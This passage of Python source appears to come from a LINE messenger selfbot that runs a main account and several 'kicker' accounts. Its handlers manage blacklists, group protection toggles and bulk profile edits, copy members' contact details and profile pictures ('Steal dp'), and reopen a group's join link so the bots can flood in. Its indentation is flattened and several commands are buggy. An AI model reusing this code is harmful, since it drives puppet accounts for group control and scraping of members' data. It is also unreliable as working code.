cl.sendText(msg.to,"Done")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"Tidak ada dalam daftar hitam👈")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"sudah masuk daftar hitam")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Done👈")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done👈")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"Done👈")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "💟ลิ้งโพสอยู่ด้านล้างน้ะจ้ะ💟\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text.lower() == 'help':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpMessage)
#----------------------------------------------
elif "Me @" in msg.text:
msg.contentType = 13
_name = msg.text.replace("Me @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentMetadata = {'mid': g.mid}
cl.sendMessage(msg)
else:
pass
#-----------------------------------------------
elif msg.text in ["Conban","Contactban","Contact ban"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada Blacklist")
else:
cl.sendText(msg.to,"Daftar Blacklist")
h = ""
for i in wait["blacklist"]:
h = cl.getContact(i)
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': i}
cl.sendMessage(M)
#----------------------------------------------------------
elif "M @" in msg.text:
_name = msg.text.replace("M @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
#----------------------------------------------------------
elif msg.text in ["group","รายชื่อ"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[★] %s\n" % (cl.getGroup(i).name +"→["+str(len(cl.getGroup(i).members))+"]")
cl.sendText(msg.to,"▒▒▓█[List Group]█▓▒▒\n"+ h +"Total Group =" +"["+str(len(gid))+"]")
#-----------------------------------------------
elif "Steal dp @" in msg.text:
nama = msg.text.replace("Steal dp @","")
target = nama.rstrip(' ')
van = cl.getGroup(msg.to)
for linedev in van.members:
if target == linedev.displayName:
midddd = cl.getContact(linedev.mid)
PATH = "http://dl.profile.line-cdn.net/" + midddd.pictureStatus
cl.sendImageWithURL(msg.to,PATH)
#================================================
elif msg.text in ["bot"]:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
ki5.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki6mid}
ki6.sendMessage(msg)
elif "As1" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
elif "As2" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
elif "As3" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
elif "As4" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
elif "As5" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
ki5.sendMessage(msg)
elif msg.text in ["Bot1 Gift","As1 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '2'}
msg.text = None
ki.sendMessage(msg)
elif msg.text in ["Gift","gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["Bot2 Gift","As2 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
ki2.sendMessage(msg)
elif msg.text in ["Bot3 Gift","As3 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '4'}
msg.text = None
ki3.sendMessage(msg)
elif msg.text in ["Bot4 Gift","As4 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
ki4.sendMessage(msg)
elif msg.text in ["Allgift","All Gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
cl.sendMessage(msg)
ki.sendMessage(msg)
ki2.sendMessage(msg)
ki3.sendMessage(msg)
ki4.sendMessage(msg)
ki5.sendMessage(msg)
# if "MENTION" in msg.contentMetadata.keys() != None:
# if wait['detectMention'] == True:
# contact = kr.getContact(msg.from_)
# image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
# cName = contact.displayName
# msg.text1 = "@"+cName+" "
# balas = ["💓อย่าแท้กสิเตง💓"]
# ret_ = msg.text1 + random.choice(balas)
# name = re.findall(r'@(\w+)', msg.text)
# mention = ast.literal_eval(msg.contentMetadata["MENTION"])
# mentionees = mention['MENTIONEES']
# for mention in mentionees:
# if mention['M'] in Bots:
# kr.sendText(msg.to,ret_)
# kr.sendImageWithURL(msg.to,image)
# break
elif msg.text in ["Cancel","cancel","ยกเชิญ","ยก"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
if group.invitee is not None:
gInviMids = [contact.mid for contact in group.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No invites👈")
else:
cl.sendText(msg.to,"Invite people inside not👈")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada undangan👈")
else:
cl.sendText(msg.to,"invitan tidak ada")
elif "Contact" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.to}
cl.sendMessage(msg)
elif "As1 mid" == msg.text:
ki.sendText(msg.to,kimid)
elif "As2 mid" == msg.text:
ki2.sendText(msg.to,ki2mid)
elif "As3 mid" == msg.text:
ki3.sendText(msg.to,ki3mid)
elif "As4 mid" == msg.text:
ki4.sendText(msg.to,ki4mid)
elif "As5 mid" == msg.text:
ki5.sendText(msg.to,ki5mid)
elif "All mid" == msg.text:
ki.sendText(msg.to,kimid)
ki2.sendText(msg.to,ki2mid)
ki3.sendText(msg.to,ki3mid)
ki4.sendText(msg.to,ki4mid)
ki5.sendText(msg.to,ki5mid)
elif "Mic:" in msg.text:
mmid = msg.text.replace("Mic:","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif "Timeline: " in msg.text:
tl_text = msg.text.replace("Timeline: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif "Allname: " in msg.text:
string = msg.text.replace("Allname: ","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki5.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
elif "Allbio: " in msg.text:
string = msg.text.replace("Allbio: ","")
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki2.getProfile()
profile.statusMessage = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki3.getProfile()
profile.statusMessage = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki4.getProfile()
profile.statusMessage = string
ki4.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki5.getProfile()
profile.statusMessage = string
ki5.updateProfile(profile)
#---------------------------------------------------------
elif "Name:" in msg.text:
string = msg.text.replace("Name:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"The name " + string + " I did NI change。")
elif "Name Bot" in msg.text:
string = msg.text.replace("Name Bot","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki2.updateProfile(profile)
ki3.updateProfile(profile)
ki4.updateProfile(profile)
ki5.updateProfile(profile)
cl.sendText(msg.to,"The name " + string + " I did NI change。")
#---------------------------------------------------------
elif "K1 upname:" in msg.text:
string = msg.text.replace("K1 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
elif "K2 upname:" in msg.text:
string = msg.text.replace("K2 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
ki2.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
elif "K3 upname:" in msg.text:
string = msg.text.replace("K3 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
ki3.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
elif "K4 upname:" in msg.text:
string = msg.text.replace("K4 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
ki4.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
elif "K5 upname:" in msg.text:
string = msg.text.replace("K5 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
ki5.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
#--------------------------------------------------------
elif msg.text.lower() == 'allin':
Ticket = cl.reissueGroupTicket(msg.to)
invsend = 0.22222
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.021)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.011)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.011)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.011)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.011)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
random.choice(KAC).updateGroup(G)
#-----------------------------------------------------
elif msg.text in ["Notifed on","เปิดแจ้งเตือน","M on"]:
if msg.from_ in admin:
if wait["Notifed"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed On\n\nเปิดเเจ้งเเตือนของค���ณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
else:
wait["Notifed"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed On\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
elif msg.text in ["Notifed off","ปิดแจ้งเตือน","M off"]:
if msg.from_ in admin:
if wait["Notifed"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed Off\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
wait["Notifed"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed Off\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
#======================================================#
#-----------------------------------------------
elif "Mic: " in msg.text:
mmid = msg.text.replace("Mic: ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif msg.text.lower() == 'contact on':
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah On")
else:
cl.sendText(msg.to,"It is already open")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟เปิดอ่านคอนแทคสำเร็จ🌟")
else:
cl.sendText(msg.to,"It is already open ")
elif msg.text.lower() == 'contact off':
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"sudah off 👈")
else:
cl.sendText(msg.to,"It is already off 👈")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"off already")
else:
cl.sendText(msg.to,"🌟ปิดอ่านคอนแทคสำเร็จ🌟")
elif msg.text.lower() == 'protect on':
if wait["protect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ��")
else:
wait["protect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ป้องกันเปิดสำเร็จ🌟")
else:
cl.sendText(msg.to,"It is already On ")
elif msg.text.lower() == 'qrprotect on':
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on ��")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka 👈")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคลิ้งคิวอาร์โค���ตเปิด🌟")
else:
cl.sendText(msg.to,"It is already On ")
elif msg.text.lower() == 'inviteprotect on':
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka 👈")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"��ล็อคการเชิญกลุ่มเปิด🌟")
else:
cl.sendText(msg.to,"It is already On ")
elif msg.text.lower() == 'cancelprotect on':
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka 👈")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคยกเลิกเชิญสมาชิกเปิด🌟")
else:
cl.sendText(msg.to,"It is already On ")
elif msg.text in ["Respontag on","Autorespon:on","Respon on","Respon:on"]:
wait['detectMention'] = True
cl.sendText(msg.to,"Auto respon tag On")
elif msg.text in ["Respontag off","Autorespon:off","Respon off","Respon:off"]:
wait['detectMention'] = False
cl.sendText(msg.to,"Auto respon tag Off")
elif msg.text in ["on"]:
wait['group'] = True
cl.sendText(msg.to,"เปิดต้อนรับแร้ว")
elif msg.text in ["off"]:
wait['group'] = False
cl.sendText(msg.to,"ปิดข้อความ")
elif msg.text in ["Sambutan on"]:
if wait["Sambutan"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sambutan Di Aktifkanヾ(*´∀`*)ノ")
else:
wait["Sambutan"] = True
wait["joinkick"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah Onヽ(´▽`)/")
elif msg.text in ["Sambutan off"]:
if wait["Sambutan"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sambutan Di Nonaktifkan( ^∇^)")
else:
wait["Sambutan"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah Off(p′︵‵。)")
elif msg.text.lower() == 'join on':
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah off 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ออโต้เข้ากลุ่มเปิด🌟")
else:
cl.sendText(msg.to,"It is already On ô€¨")
elif msg.text in ["Allprotect on","Panick:on"]:
if msg.from_ in admin:
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคเชิญเปิด🌟")
else:
cl.sendText(msg.to,"🌟ล็อคเชิญเปิด🌟")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคเชิญเปิด🌟")
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคยกเลิกเชิญเปิด🌟")
else:
cl.sendText(msg.to,"🌟ล็อคยกเลิกเชิญเปิด🌟")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคยกเลิกเชิญเปิด🌟")
if wait["protect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ป้องกันเปิด🌟")
else:
cl.sendText(msg.to,"🌟ป้องกันเปิด🌟")
else:
wait["protect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ป้องกันเปิด🌟")
else:
cl.sendText(msg.to,"🌟ป้องกันเปิด🌟")
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคลิ้งคิวอาร์โค้ตเปิด🌟")
else:
cl.sendText(msg.to,"🌟ล็อคลิ้งคิวอาร์โค้ตเปิด🌟")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคลิ้งคิวอาร์โค้ตเปิด🌟")
else:
cl.sendText(msg.to,"🌟ล็อคลิ้งคิวอาร์โค้ตเปิด🌟")
elif msg.text in ["Allprotect off","Panick:off"]:
if msg.from_ in admin:
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ล็อคเชิญปิด✨")
else:
cl.sendText(msg.to,"✨ล็อคเชิญปิด✨")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ล็อคเชิญปิด✨")
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันยกเลิกเชิญปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันยกเลิกเชิญปิด✨")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันยกเลิกเชิญปิด✨")
if wait["protect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันปิด✨")
else:
wait["protect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันปิด✨")
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร์โค้ตปิด✨")
else:
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร์โค้ตปิด✨")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร์โค้ตปิด✨")
else:
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร์โค้ตปิด✨")
elif msg.text.lower() == 'join off':
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ออโต้เข้ากลุ่มปิด✨")
else:
cl.sendText(msg.to,"✨ออโต้เข้ากลุ่มปิด✨")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ออโต้เข้ากลุ่มปิด✨")
else:
cl.sendText(msg.to,"✨ออโต้เข้ากลุ่มปิด✨")
elif msg.text in ["Protect off"]:
if wait["protect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันปิด✨")
else:
wait["protect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันปิด✨")
elif msg.text in ["Qrprotect off","qrprotect off"]:
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร์โค้ตปิด✨")
else:
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร์โค้ตปิด✨")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร์โค้ตปิด✨")
else:
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร์โค้ตปิด✨")
elif msg.text in ["Inviteprotect off"]:
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันเชิญปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันเชิญปิด✨")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันเชิญปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันเชิญปิด✨")
elif msg.text in ["Cancelprotect off"]:
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันยกเลิกเชิญปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันยกเลิกเชิญปิด✨")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันยกเลิกเชิญปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันยกเลิกเชิญปิด✨")
elif "Gcancel:" in msg.text:
if msg.from_ in admin:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒绝。要时开请指定人数发送")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + " The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的小组用自动邀请拒绝")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["Leave on","Auto leave: on"]:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"on👈")
else:
cl.sendText(msg.to,"Sudah terbuka ")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done👈")
else:
cl.sendText(msg.to,"Is already open👈")
elif msg.text in ["Leave off","Auto leave: off"]:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"on👈")
else:
cl.sendText(msg.to,"Sudah off👈")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done👈")
else:
cl.sendText(msg.to,"Is already close👈")
elif msg.text in ["Share on","share on"]:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done ")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka👈")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"on👈")
else:
cl.sendText(msg.to,"on👈")
elif msg.text in ["Share off","share off"]:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done👈")
else:
cl.sendText(msg.to,"It is already turned off 👈")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Off👈")
else:
cl.sendText(msg.to,"Off👈")
elif msg.text in ["Welcome:on"]:
if msg.from_ in admin:
if wait["welcomemsg"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomesg"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on")
elif msg.text in ["Welcome:off"]:
if msg.from_ in admin:
if wait["welcomemsg"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomemsg"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text.lower() == 'set':
md = ""
if wait["contact"] == True: md+="☞ Contact → ✔\n"
else: md+="🔚 Contact → ❎\n"
if wait["autoJoin"] == True: md+="☞ Auto Join → ✔\n"
else: md+="🔚 Auto Join → ❎\n"
if wait["autoCancel"]["on"] == True:md+="☞ Auto cancel: " + str(wait["autoCancel"]["members"]) + " → ✔\n"
else: md+="🔚 Group cancel → ❎\n"
if wait["leaveRoom"] == True: md+="☞ Auto leave → ✔\n"
else: md+="🔚 Auto leave → ❎\n"
if wait["timeline"] == True: md+="☞ share → ✔\n"
else:md+="🔚 Share → ❎\n"
if wait["autoAdd"] == True: md+="☞ Auto add → ✔\n"
else:md+="🔚 Auto add → ❎\n"
if wait["commentOn"] == True: md+="☞ Auto komentar → ✔\n"
else:md+="🔚 Auto komentar → ❎\n"
if wait["protect"] == True: md+="☞ Protect → ✔\n"
else:md+="🔚 Protect → ❎\n"
if wait["linkprotect"] == True: md+="☞ Link Protect → ✔\n"
else:md+="🔚 Link Protect → ❎\n"
if wait["inviteprotect"] == True: md+="☞ Invitation Protect → ✔\n"
else:md+="🔚 Invitation Protect → ❎\n"
if wait["cancelprotect"] == True: md+="☞ Cancel Protect → ✔\n"
else:md+="🔚 Cancel Protect → ❎\n"
if wait["likeOn"] == True: md+="☞ Auto like → ✔\n"
else:md+="🔚 Auto like → ❎\n"
if wait["Sambutan"] == True: md+="☞ Sambutan → ✔\n"
else:md+="🔚 Sambutan → ❎\n" + datetime.now().strftime('\n📅%Y/%m/%d 🕛 %H:%M:%S')
cl.sendText(msg.to,md)
msg.contentType = 13
msg.contentMetadata = {'mid': admsa}
cl.sendMessage(msg)
elif msg.text in ["Like on"]:
if wait["likeon"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["Like on"] = True
if wait["likeon"] == "JP":
cl.sendText(msg.to,"Already。")
elif msg.text in ["Like off"]:
if wait["likeoff"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeoff"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
elif msg.text in ["Add on","Add auto on"]:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already On")
else:
cl.sendText(msg.to,"Already On👈")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already On👈")
else:
cl.sendText(msg.to,"Already On👈")
elif msg.text in ["Add off","Add auto off"]:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini sudah off👈")
else:
cl.sendText(msg.to,"Hal ini sudah dimatikan👈")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already Off👈")
else:
cl.sendText(msg.to,"Untuk mengaktifkan-off👈")
elif "Message set: " in msg.text:
wait["message"] = msg.text.replace("Message set: ","")
cl.sendText(msg.to,"We changed the message👈")
elif "Help set: " in msg.text:
wait["help"] = msg.text.replace("Help set: ","")
cl.sendText(msg.to,"We changed the Help👈")
elif "Pesan add: " in msg.text:
